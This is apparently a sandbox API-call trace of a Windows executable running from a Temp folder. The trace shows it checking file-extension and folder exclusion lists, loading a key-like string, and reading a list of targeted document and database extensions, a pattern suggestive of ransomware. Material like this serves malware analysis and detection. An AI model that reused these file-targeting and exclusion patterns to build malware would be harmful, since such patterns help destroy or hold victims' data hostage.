returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", 
cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.940] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 
[0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 
[0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0096.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0096.942] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0096.942] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0096.942] LockResource (hResData=0x516f58) returned 0x516f58 [0096.942] FreeResource (hResData=0x516f58) returned 0 [0096.942] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0096.942] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0096.942] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0096.942] LockResource (hResData=0x50d64c) returned 0x50d64c [0096.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0096.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0096.942] FreeResource (hResData=0x50d64c) returned 0 [0096.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, 
cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.942] GetCurrentThreadId () returned 0xb78 [0096.943] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0096.943] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0096.943] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0096.943] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0096.943] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0096.943] CharLowerBuffW (in: 
lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 
lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xba0) returned 0xb8 [0097.354] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0097.354] ResumeThread (hThread=0xb8) returned 0x1 [0097.354] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0097.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0097.651] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0097.651] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0097.651] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0097.652] LockResource (hResData=0x5187d4) returned 0x5187d4 [0097.652] FreeResource (hResData=0x5187d4) returned 0 [0097.652] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0097.652] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0097.652] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0097.652] LockResource (hResData=0x50d64c) returned 0x50d64c [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 